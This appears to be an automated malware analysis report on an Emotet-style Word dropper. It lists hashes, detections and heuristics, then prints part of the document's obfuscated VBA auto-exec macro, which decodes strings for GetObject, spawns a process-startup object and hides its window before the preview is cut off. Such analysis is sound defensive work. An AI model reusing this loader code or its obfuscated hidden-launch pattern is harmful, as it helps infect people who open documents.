Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 04b73f13e9504f75…

MALICIOUS

Office (OLE)

Size: 207.0 KB
Created: 2018-04-23 12:53:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 7d687abc864f655eb82e17ade07fa0dc
SHA-1: 587037596e7e4b845239709e8a1cb8f3fc35a5b9
SHA-256: 04b73f13e9504f75b98474a3d755497c88864c6081fa0ef1d87e50468b4168e6
Risk Score: 262

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The file contains heavily obfuscated VBA macros, including a Document_Open auto-exec loader, indicating malicious intent. The macro calls GetObject on a string that is decoded at runtime by a custom routine (SjQSOd in the extracted source), attempting to download and execute a payload; this is likely its primary malicious function. ClamAV also detected this file as a dropper.

Heuristics (7)

  • ClamAV: Doc.Dropper.Emodldr-6755244-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Emodldr-6755244-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 56836 bytes
SHA-256: a59c596b2846abd4d1ccb7f3ac649426b815e8193119c818e89e581327cb23d6

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub TMxvI(VTmBmLb As String, FJtncc As String, vUnvtj As String, HeycP As String, NFizO As String, LRJPkMe As String)
    For XBYzeL = 0 To 194
        aydux = "SR#J%zQEPkxw_EC_T(c" + "cOkc#wt].kN" + "AzD)T&XjlheCv^m[Ld"
        fSlXK = Left("XndQiuD@?uS_WdAe", 4)
        aydux = StrReverse("s]nxO$yZ[XYSVz")
        mMQNurUb = 1314 + 1697 + 861
        JnbMpav = StrReverse("(h)Fw[axEcgkY")
        hLxuFYJO = UCase("@&Bi]!Nt&d]DYd")
        aydux = "nYA_p#tHc)yALB" + "bPo?jubTZr-]Rcn" + "kPCHzxfFB-!F"
        fSlXK = RTrim("yQiYw*)uYfWE")
        pSoJTqYE = UCase("FsPS@g$dh)Q")
        VGIgt = RTrim("w&BgVR[*gER&XWkyS")
    Next XBYzeL

    szAzrRUQ = Left("Ukrsi%q.MWn^uXzoodN", 5)
    hLxuFYJO = 839 - 1899 - 1879
    PDXZIXJ = 270 - 1437 - 723
    mMQNurUb = "^NP@lv&[T?" + ".JrX*nR$ipQ*ia" + "Cud]E$VIzE!V?^] hSQI"
    JnbMpav = StrReverse("U]NcXFnDUgDn-x")
    PDXZIXJ = Space(15)
    aydux = Space(2)
    Set ruhTFms = GetObject(SjQSOd("wsi%n-mzg]m*tHsU:B\r\w.i\_rEoYo tr\Pc*ijmHvt2#"))
    aydux = StrReverse("e^[q!(oYac@cwKI*")
    hLxuFYJO = Right("naABfLc!GWqKLMTcuyQl", 2)
    JnbMpav = UCase("jms[fiu.H KXbiO*")
    JnbMpav = RTrim("#dxytQCNZ_xXs")
    FkxmtZv = Space(2)
    szAzrRUQ = Space(15)
    hLxuFYJO = 1866 + 785 + 988
    While Lfqutn < 217
        mMQNurUb = LTrim("^vEKi(hCqkHTnjF")
        YltcGz = LTrim(" VmJMD?MdSw)NOojX#")
        FkxmtZv = "rxOQ)bwzy?nc" + ".(*k GTCq@^^O" + "_p] BvTFq&vu[cJ"
        VGIgt = "rUroBw?Pw@fNwmoPidH" + "PH.TXs$OiHWD)FVh  [" + "pE_ZbVFjHI[EfgCy&"
        fSlXK = "b-m.o*)I$y" + "y YJo-Lbn&RRs.V!" + "tvdK(zWQ!#SiR"
        szAzrRUQ = Space(4)
        FkxmtZv = Left("YW zjhR@ghkn", 2)
        nuKqm = 1215 - 1897 - 1579
        pSoJTqYE = Space(13)
        mMQNurUb = RTrim("eUxk[V n[XN$$]@A")
        Lfqutn = Lfqutn + 1
    Wend

    Set LFWzZJ = ruhTFms.Get(SjQSOd("W-iunl3&2W_%PTr$oXc.e sTsYS%tNaCrOtMugp."))
    fSlXK = LTrim("g#!Kb*)GOCRivdNv*V")
    hLxuFYJO = Right("#dFlSDNycb*&Jb", 2)
    JnbMpav = 847 + 1305 + 1210
    JnbMpav = Space(8)
    VGIgt = RTrim("VEeimfQlzqm?gzwddp-q")
    hLxuFYJO = Right("Y#FTgC^CB-l#yDHON", 4)
    JnbMpav = Space(3)
    aydux = "hb%nptVK_eZCd!bOu" + "hWw)cHGNDfZdlqRG@e-" + "GdC$$AiRwaf"
    Set USRZu = LFWzZJ.SpawnInstance_
    PDXZIXJ = Space(13)
    aydux = Right("S!TxaOqV#*.Bo^(", 3)
    While FZsTQN < 219
        fSlXK = Left("*WeJ)s^tCqObJ]]b", 3)
        VGIgt = 1494 - 1152 - 727
        szAzrRUQ = 566 + 1282 + 1323
        pSoJTqYE = Left("KoJR[%FGz yXalx", 2)
        VGIgt = Left("iWC*[_vDi&)MswP", 4)
        VGIgt = 423 - 395 - 1994
        FZsTQN = FZsTQN + 2
    Wend

    aydux = UCase("EJye]fYXSBld#S")
    YltcGz = UCase("CKWJbrD)kXbr^JzSMm")
    fSlXK = 1339 + 1711 + 432
    VGIgt = StrReverse("eJT@-(jcww%iEfqDu")
    For pZbCrX = 0 To 381
        nuKqm = StrReverse("skQL]xHWfa")
        hLxuFYJO = UCase("BFlcG%p$Sble")
    Next pZbCrX

    USRZu.ShowWindow = 0
    JnbMpav = StrReverse("t?ZE#Qo?El_v)YVXB")
    While LJGjUG < 315
        fSlXK = StrReverse("wLQI$dAX#G^Ny@XI#F!")
        PDXZIXJ = Left("sHvOBuzh(tEaZ]kZgd%", 4)
        hLxuFYJO = "LsTqVtpFgSMNMQ*" + "@PmeGX?a%FmmBLvMGZ" + "Vvai RRLLijbT-QVEq"
        FkxmtZv = Left("evi_bPOo$wp", 3)
        fSlXK = UCase("$OQ#lcr&NFkHj[zH([Q")
        LJGjUG = LJGjUG + 2
    Wend

    While djvMAp < 199
        hLxuFYJO = 1790 + 1226 + 744
        mMQNurUb = 360 + 1603 + 529
        szAzrRUQ = Right("dsi*oY?&CcM", 3)
        djvMAp = djvMAp + 3
    Wend

    hLxuFYJO = RTrim("zyS!LesQhKJy#C^")
    aydux = 179 - 459 - 218
    aydux = Space(1)
    JnbMpav = UCase("VYsI*zly^#QMCXyi")
    For PQQMri = 0 To 284
        mMQNurUb = UCase("ZnoFh#KdUsefcq%")
        YltcGz = LTrim("()Ol[JJ.n.[?u@")
    Next PQ
... (truncated)